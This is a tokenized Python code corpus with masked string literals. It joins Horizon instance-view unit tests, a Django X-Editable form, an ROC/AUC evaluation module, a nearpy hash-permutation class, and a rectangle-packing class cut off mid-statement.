assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] , { } ) <EOL> self . mox . VerifyAll ( ) <EOL> self . reset_times ( ) <EOL> def test_instance_usage_default_tenant ( self ) : <EOL> TEST_RETURN = '<STR_LIT>' <EOL> now = self . override_times ( ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . usage_get ( IsA ( http . HttpRequest ) , self . TEST_TENANT , <EOL> datetime . datetime ( now . year , now . month , <NUM_LIT:1> , <EOL> now . hour , now . minute , now . second ) , <EOL> now ) . AndReturn ( TEST_RETURN ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] , TEST_RETURN ) <EOL> self . mox . VerifyAll ( ) <EOL> self . reset_times ( ) <EOL> def test_instance_console ( self ) : <EOL> CONSOLE_OUTPUT = '<STR_LIT>' <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> console_mock = self . mox . CreateMock ( api . Console ) <EOL> console_mock . output = CONSOLE_OUTPUT <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . console_create ( IgnoreArg ( ) , <EOL> unicode ( INSTANCE_ID ) , <EOL> IgnoreArg ( ) ) . AndReturn ( console_mock ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertIsInstance ( res , http . HttpResponse ) <EOL> self . assertContains ( res , CONSOLE_OUTPUT ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_console_exception ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' , <EOL> message = '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . console_create ( IgnoreArg ( ) , <EOL> unicode ( INSTANCE_ID ) , <EOL> IgnoreArg ( ) ) . AndRaise ( exception ) <EOL> self . mox . 
StubOutWithMock ( messages , '<STR_LIT:error>' ) <EOL> messages . error ( IgnoreArg ( ) , IsA ( unicode ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_vnc ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> CONSOLE_OUTPUT = '<STR_LIT>' <EOL> console_mock = self . mox . CreateMock ( api . Console ) <EOL> console_mock . output = CONSOLE_OUTPUT <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> str ( self . servers [ <NUM_LIT:0> ] . id ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> api . console_create ( IgnoreArg ( ) , <EOL> unicode ( INSTANCE_ID ) , <EOL> '<STR_LIT>' ) . AndReturn ( console_mock ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertRedirectsNoFollow ( res , <EOL> CONSOLE_OUTPUT + '<STR_LIT>' ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_vnc_exception ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' , <EOL> message = '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . console_create ( IsA ( http . HttpRequest ) , <EOL> unicode ( INSTANCE_ID ) , <EOL> '<STR_LIT>' ) . AndRaise ( exception ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . 
VerifyAll ( ) <EOL> def test_instance_update_get ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> unicode ( INSTANCE_ID ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_update_get_server_get_exception ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> unicode ( INSTANCE_ID ) ) . AndRaise ( exception ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_update_post ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> NAME = '<STR_LIT>' <EOL> DESC = '<STR_LIT>' <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . servers [ <NUM_LIT:0> ] . id , <EOL> '<STR_LIT:name>' : NAME , <EOL> '<STR_LIT>' : self . TEST_TENANT , <EOL> '<STR_LIT:description>' : DESC } <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> unicode ( INSTANCE_ID ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_update ( IsA ( http . HttpRequest ) , <EOL> str ( INSTANCE_ID ) , NAME , DESC ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . 
post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , <EOL> INSTANCE_ID ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_update_post_api_exception ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> NAME = '<STR_LIT>' <EOL> DESC = '<STR_LIT>' <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : INSTANCE_ID , <EOL> '<STR_LIT:name>' : NAME , <EOL> '<STR_LIT>' : self . TEST_TENANT , <EOL> '<STR_LIT:description>' : DESC } <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> unicode ( INSTANCE_ID ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_update ( IsA ( http . HttpRequest ) , <EOL> str ( INSTANCE_ID ) , NAME , DESC ) . AndRaise ( exception ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , <EOL> INSTANCE_ID ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) </s>
<s> from django import forms <EOL> from django . forms import ValidationError <EOL> from django . forms . models import fields_for_model <EOL> class XEditableUpdateForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> pk = forms . CharField ( max_length = <NUM_LIT> ) <EOL> name = forms . CharField ( max_length = <NUM_LIT:100> ) <EOL> def __init__ ( self , model , data , * args , ** kwargs ) : <EOL> super ( XEditableUpdateForm , self ) . __init__ ( data , * args , ** kwargs ) <EOL> self . model = model <EOL> self . set_value_field ( model , data . get ( '<STR_LIT:name>' ) ) <EOL> def set_value_field ( self , model , field_name ) : <EOL> """<STR_LIT>""" <EOL> fields = fields_for_model ( model , fields = [ field_name ] ) <EOL> self . fields [ '<STR_LIT:value>' ] = fields [ field_name ] <EOL> def clean_name ( self ) : <EOL> """<STR_LIT>""" <EOL> field_name = self . cleaned_data [ '<STR_LIT:name>' ] <EOL> if hasattr ( self . model . _meta , '<STR_LIT>' ) : <EOL> field_names = [ field . name for field in self . model . _meta . get_fields ( ) ] <EOL> else : <EOL> field_names = self . model . _meta . get_all_field_names ( ) <EOL> if field_name not in field_names : <EOL> raise ValidationError ( "<STR_LIT>" % field_name ) <EOL> return field_name </s>
<s> """<STR_LIT>""" <EOL> import random <EOL> import math <EOL> try : <EOL> import pylab <EOL> except : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> def random_mixture_model ( pos_mu = <NUM_LIT> , pos_sigma = <NUM_LIT> , neg_mu = <NUM_LIT> , neg_sigma = <NUM_LIT> , size = <NUM_LIT:200> ) : <EOL> pos = [ ( <NUM_LIT:1> , random . gauss ( pos_mu , pos_sigma ) , ) for x in xrange ( size / <NUM_LIT:2> ) ] <EOL> neg = [ ( <NUM_LIT:0> , random . gauss ( neg_mu , neg_sigma ) , ) for x in xrange ( size / <NUM_LIT:2> ) ] <EOL> return pos + neg <EOL> def plot_multiple_rocs_separate ( rocList , title = '<STR_LIT>' , labels = None , equal_aspect = True ) : <EOL> """<STR_LIT>""" <EOL> pylab . clf ( ) <EOL> pylab . title ( title ) <EOL> for ix , r in enumerate ( rocList ) : <EOL> ax = pylab . subplot ( <NUM_LIT:4> , <NUM_LIT:4> , ix + <NUM_LIT:1> ) <EOL> pylab . ylim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> pylab . xlim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> ax . set_yticklabels ( [ ] ) <EOL> ax . set_xticklabels ( [ ] ) <EOL> if equal_aspect : <EOL> cax = pylab . gca ( ) <EOL> cax . set_aspect ( '<STR_LIT>' ) <EOL> if not labels : <EOL> labels = [ '<STR_LIT>' for x in rocList ] <EOL> pylab . text ( <NUM_LIT> , <NUM_LIT:0.1> , labels [ ix ] , fontsize = <NUM_LIT:8> ) <EOL> pylab . plot ( [ x [ <NUM_LIT:0> ] for x in r . derived_points ] , [ y [ <NUM_LIT:1> ] for y in r . derived_points ] , '<STR_LIT>' , linewidth = <NUM_LIT:2> ) <EOL> pylab . show ( ) <EOL> def _remove_duplicate_styles ( rocList ) : <EOL> """<STR_LIT>""" <EOL> pref_styles = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> points = '<STR_LIT>' <EOL> colors = '<STR_LIT>' <EOL> lines = [ '<STR_LIT:->' , '<STR_LIT>' , '<STR_LIT::>' ] <EOL> rand_ls = [ ] <EOL> for r in rocList : <EOL> if r . linestyle not in rand_ls : <EOL> rand_ls . append ( r . linestyle ) <EOL> else : <EOL> while True : <EOL> if len ( pref_styles ) > <NUM_LIT:0> : <EOL> pstyle = pref_styles . 
pop ( ) <EOL> if pstyle not in rand_ls : <EOL> r . linestyle = pstyle <EOL> rand_ls . append ( pstyle ) <EOL> break <EOL> else : <EOL> ls = '<STR_LIT>' . join ( random . sample ( colors , <NUM_LIT:1> ) + random . sample ( points , <NUM_LIT:1> ) + random . sample ( lines , <NUM_LIT:1> ) ) <EOL> if ls not in rand_ls : <EOL> r . linestyle = ls <EOL> rand_ls . append ( ls ) <EOL> break <EOL> def plot_multiple_roc ( rocList , title = '<STR_LIT>' , labels = None , include_baseline = False , equal_aspect = True ) : <EOL> """<STR_LIT>""" <EOL> pylab . clf ( ) <EOL> pylab . ylim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> pylab . xlim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> pylab . xticks ( pylab . arange ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> pylab . yticks ( pylab . arange ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> pylab . grid ( True ) <EOL> if equal_aspect : <EOL> cax = pylab . gca ( ) <EOL> cax . set_aspect ( '<STR_LIT>' ) <EOL> pylab . xlabel ( "<STR_LIT>" ) <EOL> pylab . ylabel ( "<STR_LIT>" ) <EOL> pylab . title ( title ) <EOL> if not labels : <EOL> labels = [ '<STR_LIT>' for x in rocList ] <EOL> _remove_duplicate_styles ( rocList ) <EOL> for ix , r in enumerate ( rocList ) : <EOL> pylab . plot ( [ x [ <NUM_LIT:0> ] for x in r . derived_points ] , [ y [ <NUM_LIT:1> ] for y in r . derived_points ] , r . linestyle , linewidth = <NUM_LIT:1> , label = labels [ ix ] ) <EOL> if include_baseline : <EOL> pylab . plot ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] , [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] , '<STR_LIT>' , label = '<STR_LIT>' ) <EOL> if labels : <EOL> pylab . legend ( loc = '<STR_LIT>' ) <EOL> pylab . show ( ) <EOL> def load_decision_function ( path ) : <EOL> """<STR_LIT>""" <EOL> fileHandler = open ( path , '<STR_LIT:r>' ) <EOL> reader = fileHandler . readlines ( ) <EOL> reader = [ line . strip ( ) . 
split ( ) for line in reader ] <EOL> model_data = [ ] <EOL> for line in reader : <EOL> if len ( line ) == <NUM_LIT:0> : continue <EOL> fClass , fValue = line <EOL> model_data . append ( ( int ( fClass ) , float ( fValue ) ) ) <EOL> fileHandler . close ( ) <EOL> return model_data <EOL> class ROCData ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data , linestyle = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . data = sorted ( data , lambda x , y : cmp ( y [ <NUM_LIT:1> ] , x [ <NUM_LIT:1> ] ) ) <EOL> self . linestyle = linestyle <EOL> self . auc ( ) <EOL> def auc ( self , fpnum = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> fps_count = <NUM_LIT:0> <EOL> relevant_pauc = [ ] <EOL> current_index = <NUM_LIT:0> <EOL> max_n = len ( [ x for x in self . data if x [ <NUM_LIT:0> ] == <NUM_LIT:0> ] ) <EOL> if fpnum == <NUM_LIT:0> : <EOL> relevant_pauc = [ x for x in self . data ] <EOL> elif fpnum > max_n : <EOL> fpnum = max_n <EOL> else : <EOL> while fps_count < fpnum : <EOL> relevant_pauc . append ( self . data [ current_index ] ) <EOL> if self . data [ current_index ] [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> fps_count += <NUM_LIT:1> <EOL> current_index += <NUM_LIT:1> <EOL> total_n = len ( [ x for x in relevant_pauc if x [ <NUM_LIT:0> ] == <NUM_LIT:0> ] ) <EOL> total_p = len ( relevant_pauc ) - total_n <EOL> previous_df = - <NUM_LIT> <EOL> current_index = <NUM_LIT:0> <EOL> points = [ ] <EOL> tp_count , fp_count = <NUM_LIT:0.0> , <NUM_LIT:0.0> <EOL> tpr , fpr = <NUM_LIT:0> , <NUM_LIT:0> <EOL> while current_index < len ( relevant_pauc ) : <EOL> df = relevant_pauc [ current_index ] [ <NUM_LIT:1> ] <EOL> if previous_df != df : <EOL> points . 
append ( ( fpr , tpr , fp_count ) ) <EOL> if relevant_pauc [ current_index ] [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> fp_count += <NUM_LIT:1> <EOL> elif relevant_pauc [ current_index ] [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> tp_count += <NUM_LIT:1> <EOL> fpr = fp_count / total_n <EOL> tpr = tp_count / total_p <EOL> previous_df = df <EOL> current_index += <NUM_LIT:1> <EOL> points . append ( ( fpr , tpr , fp_count ) ) <EOL> points . sort ( key = lambda i : ( i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] ) ) <EOL> self . derived_points = points <EOL> return self . _trapezoidal_rule ( points ) <EOL> def _trapezoidal_rule ( self , curve_pts ) : <EOL> """<STR_LIT>""" <EOL> cum_area = <NUM_LIT:0.0> <EOL> for ix , x in enumerate ( curve_pts [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) : <EOL> cur_pt = x <EOL> next_pt = curve_pts [ ix + <NUM_LIT:1> ] <EOL> cum_area += ( ( cur_pt [ <NUM_LIT:1> ] + next_pt [ <NUM_LIT:1> ] ) / <NUM_LIT> ) * ( next_pt [ <NUM_LIT:0> ] - cur_pt [ <NUM_LIT:0> ] ) <EOL> return cum_area <EOL> def calculateStandardError ( self , fpnum = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> area = self . auc ( fpnum ) <EOL> Na = len ( [ x for x in self . data if x [ <NUM_LIT:0> ] == <NUM_LIT:1> ] ) <EOL> Nn = len ( [ x for x in self . data if x [ <NUM_LIT:0> ] == <NUM_LIT:0> ] ) <EOL> Q1 = area / ( <NUM_LIT> - area ) <EOL> Q2 = <NUM_LIT:2> * area * area / ( <NUM_LIT:1.0> + area ) <EOL> return math . sqrt ( ( area * ( <NUM_LIT:1.0> - area ) + ( Na - <NUM_LIT:1.0> ) * ( Q1 - area * area ) + <EOL> ( Nn - <NUM_LIT:1.0> ) * ( Q2 - area * area ) ) / ( Na * Nn ) ) <EOL> def plot ( self , title = '<STR_LIT>' , include_baseline = False , equal_aspect = True ) : <EOL> """<STR_LIT>""" <EOL> pylab . clf ( ) <EOL> pylab . plot ( [ x [ <NUM_LIT:0> ] for x in self . derived_points ] , [ y [ <NUM_LIT:1> ] for y in self . derived_points ] , self . linestyle ) <EOL> if include_baseline : <EOL> pylab . 
plot ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] , [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] , '<STR_LIT>' ) <EOL> pylab . ylim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> pylab . xlim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> pylab . xticks ( pylab . arange ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> pylab . yticks ( pylab . arange ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> pylab . grid ( True ) <EOL> if equal_aspect : <EOL> cax = pylab . gca ( ) <EOL> cax . set_aspect ( '<STR_LIT>' ) <EOL> pylab . xlabel ( '<STR_LIT>' ) <EOL> pylab . ylabel ( '<STR_LIT>' ) <EOL> pylab . title ( title ) <EOL> pylab . show ( ) <EOL> def confusion_matrix ( self , threshold , do_print = False ) : <EOL> """<STR_LIT>""" <EOL> pos_points = [ x for x in self . data if x [ <NUM_LIT:1> ] >= threshold ] <EOL> neg_points = [ x for x in self . data if x [ <NUM_LIT:1> ] < threshold ] <EOL> tp , fp , fn , tn = self . _calculate_counts ( pos_points , neg_points ) <EOL> if do_print : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % ( tp , fp ) <EOL> print "<STR_LIT>" % ( fn , tn ) <EOL> return { '<STR_LIT>' : tp , '<STR_LIT>' : fp , '<STR_LIT>' : fn , '<STR_LIT>' : tn } <EOL> def evaluateMetrics ( self , matrix , metric = None , do_print = False ) : <EOL> """<STR_LIT>""" <EOL> accuracy = ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) / float ( sum ( matrix . 
values ( ) ) ) <EOL> sensitivity = ( matrix [ '<STR_LIT>' ] ) / float ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) <EOL> specificity = ( matrix [ '<STR_LIT>' ] ) / float ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) <EOL> efficiency = ( sensitivity + specificity ) / <NUM_LIT> <EOL> positivePredictiveValue = matrix [ '<STR_LIT>' ] / float ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) <EOL> NegativePredictiveValue = matrix [ '<STR_LIT>' ] / float ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) <EOL> PhiCoefficient = ( matrix [ '<STR_LIT>' ] * matrix [ '<STR_LIT>' ] - matrix [ '<STR_LIT>' ] * matrix [ '<STR_LIT>' ] ) / ( <EOL> math . sqrt ( ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) * <EOL> ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) * <EOL> ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) * <EOL> ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) ) ) or <NUM_LIT:1.0> <EOL> if do_print : <EOL> print '<STR_LIT>' , sensitivity <EOL> print '<STR_LIT>' , specificity <EOL> print '<STR_LIT>' , efficiency <EOL> print '<STR_LIT>' , accuracy <EOL> print '<STR_LIT>' , positivePredictiveValue <EOL> print '<STR_LIT>' , NegativePredictiveValue <EOL> print '<STR_LIT>' , PhiCoefficient <EOL> return { '<STR_LIT>' : sensitivity , '<STR_LIT>' : specificity , '<STR_LIT>' : accuracy , '<STR_LIT>' : efficiency , <EOL> '<STR_LIT>' : positivePredictiveValue , '<STR_LIT>' : NegativePredictiveValue , '<STR_LIT>' : PhiCoefficient } <EOL> def _calculate_counts ( self , pos_data , neg_data ) : <EOL> """<STR_LIT>""" <EOL> tp_count = len ( [ x for x in pos_data if x [ <NUM_LIT:0> ] == <NUM_LIT:1> ] ) <EOL> fp_count = len ( [ x for x in pos_data if x [ <NUM_LIT:0> ] == <NUM_LIT:0> ] ) <EOL> fn_count = len ( [ x for x in neg_data if x [ <NUM_LIT:0> ] == <NUM_LIT:1> ] ) <EOL> tn_count = len ( [ x for x in neg_data if x [ <NUM_LIT:0> ] == <NUM_LIT:0> ] ) <EOL> return tp_count , fp_count , fn_count , tn_count <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> 
print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> from optparse import OptionParser <EOL> parser = OptionParser ( ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , default = <NUM_LIT:0> , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT:store_true>" , dest = '<STR_LIT>' , default = False , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , '<STR_LIT>' , dest = '<STR_LIT>' , default = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> ( options , args ) = parser . parse_args ( ) <EOL> if ( not options . origFile ) : <EOL> parser . print_help ( ) <EOL> exit ( ) <EOL> df_data = load_decision_function ( options . origFile ) <EOL> roc = ROCData ( df_data ) <EOL> roc_n = int ( options . fp_n ) <EOL> print "<STR_LIT>" % ( str ( roc . auc ( roc_n ) ) , ) <EOL> print '<STR_LIT>' % ( str ( roc . calculateStandardError ( roc_n ) ) , ) <EOL> print '<STR_LIT>' <EOL> for pt in roc . derived_points : <EOL> print pt [ <NUM_LIT:0> ] , pt [ <NUM_LIT:1> ] <EOL> if options . plotFlag : <EOL> roc . plot ( options . ptitle , True , True ) </s>
<s> import numpy <EOL> from nearpy . hashes import LSHash , RandomBinaryProjections , PCABinaryProjections , RandomBinaryProjectionTree <EOL> from nearpy . hashes . permutation import Permutation <EOL> class HashPermutations ( LSHash ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , hash_name ) : <EOL> """<STR_LIT>""" <EOL> super ( HashPermutations , self ) . __init__ ( hash_name ) <EOL> self . permutation = Permutation ( ) <EOL> self . child_hashes = [ ] <EOL> self . dim = None <EOL> def reset ( self , dim ) : <EOL> """<STR_LIT>""" <EOL> self . dim = dim <EOL> for child_hash in self . child_hashes : <EOL> child_hash [ '<STR_LIT>' ] . reset ( dim ) <EOL> child_hash [ '<STR_LIT>' ] = { } <EOL> def hash_vector ( self , v , querying = False ) : <EOL> """<STR_LIT>""" <EOL> bucket_keys = [ ] <EOL> if querying : <EOL> for child_hash in self . child_hashes : <EOL> lshash = child_hash [ '<STR_LIT>' ] <EOL> if not lshash . hash_name in self . permutation . permutedIndexs : <EOL> raise AttributeError ( '<STR_LIT>' % lshash . hash_name ) <EOL> for bucket_key in lshash . hash_vector ( v , querying ) : <EOL> neighbour_keys = self . permutation . get_neighbour_keys ( lshash . hash_name , bucket_key ) <EOL> for n in neighbour_keys : <EOL> bucket_keys . append ( lshash . hash_name + '<STR_LIT:_>' + n ) <EOL> else : <EOL> for child_hash in self . child_hashes : <EOL> lshash = child_hash [ '<STR_LIT>' ] <EOL> for bucket_key in lshash . hash_vector ( v , querying ) : <EOL> child_hash [ '<STR_LIT>' ] [ bucket_key ] = bucket_key <EOL> bucket_keys . append ( lshash . hash_name + '<STR_LIT:_>' + bucket_key ) <EOL> return bucket_keys <EOL> def get_config ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : self . hash_name , <EOL> '<STR_LIT>' : self . dim <EOL> } <EOL> def apply_config ( self , config ) : <EOL> """<STR_LIT>""" <EOL> self . hash_name = config [ '<STR_LIT>' ] <EOL> self . 
dim = config [ '<STR_LIT>' ] <EOL> def add_child_hash ( self , child_hash , permute_config ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( child_hash , PCABinaryProjections ) or isinstance ( child_hash , RandomBinaryProjections ) or isinstance ( child_hash , RandomBinaryProjectionTree ) ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . child_hashes . append ( { '<STR_LIT>' : child_hash , '<STR_LIT>' : permute_config , '<STR_LIT>' : { } } ) <EOL> def build_permuted_index ( self ) : <EOL> """<STR_LIT>""" <EOL> for child_hash in self . child_hashes : <EOL> config = child_hash [ '<STR_LIT>' ] <EOL> num_permutation = config [ '<STR_LIT>' ] <EOL> beam_size = config [ '<STR_LIT>' ] <EOL> num_neighbour = config [ '<STR_LIT>' ] <EOL> bucket_keys = child_hash [ '<STR_LIT>' ] . keys ( ) <EOL> lshash = child_hash [ '<STR_LIT>' ] <EOL> self . permutation . build_permuted_index ( lshash , bucket_keys , num_permutation , beam_size , num_neighbour ) </s>
<s> import subprocess <EOL> def main ( ) : <EOL> errno = subprocess . call ( [ '<STR_LIT>' ] ) <EOL> raise SystemExit ( errno ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from math . rect import Rect <EOL> class Node : <EOL> def __init__ ( self , x , y , width , height ) : <EOL> self . x = x <EOL> self . y = y <EOL> self . width = width <EOL> self . height = height <EOL> def does_rect_fit ( self , width , height ) : <EOL> resultList = [ ] <EOL> result = False <EOL> edgeCount = <NUM_LIT:0> <EOL> if ( width == self . width or height == self . height or width == self . height or height == self . width ) : <EOL> if ( width == self . width ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> if ( height == self . height ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> elif ( width == self . height ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> if ( height == self . width ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> elif ( height == self . width ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> elif ( height == self . height ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> if ( width <= self . width and height <= self . height ) : <EOL> result = True <EOL> elif ( height <= self . width and width <= self . height ) : <EOL> result = True <EOL> resultList . append ( result ) <EOL> resultList . append ( edgeCount ) <EOL> return ( resultList ) <EOL> def get_rect ( self ) : <EOL> return Rect ( self . x , self . y , self . x + self . width , self . y + self . height ) <EOL> def validate ( self , node ) : <EOL> r1 = self . get_rect ( ) <EOL> r2 = node . get_rect ( ) <EOL> return ( r1 != r2 ) <EOL> def merge ( self , node ) : <EOL> ret = False <EOL> r1 = self . get_rect ( ) <EOL> r2 = node . get_rect ( ) <EOL> r1 . x2 += <NUM_LIT:1> <EOL> r1 . y2 += <NUM_LIT:1> <EOL> r2 . x2 += <NUM_LIT:1> <EOL> r2 . y2 += <NUM_LIT:1> <EOL> if ( r1 . x1 == r2 . x1 and r1 . x2 == r2 . x2 and r1 . y1 == r2 . y2 ) : <EOL> self . y = node . y <EOL> self . height += node . get_rect ( ) . height <EOL> ret = True <EOL> elif ( r1 . x1 == r2 . x1 and r1 . x2 == r2 . x2 and r1 . y2 == r2 . y1 ) : <EOL> self . height += node . get_rect ( ) . height <EOL> ret = True <EOL> elif ( r1 . y1 == r2 . y1 and r1 . y2 == r2 . 
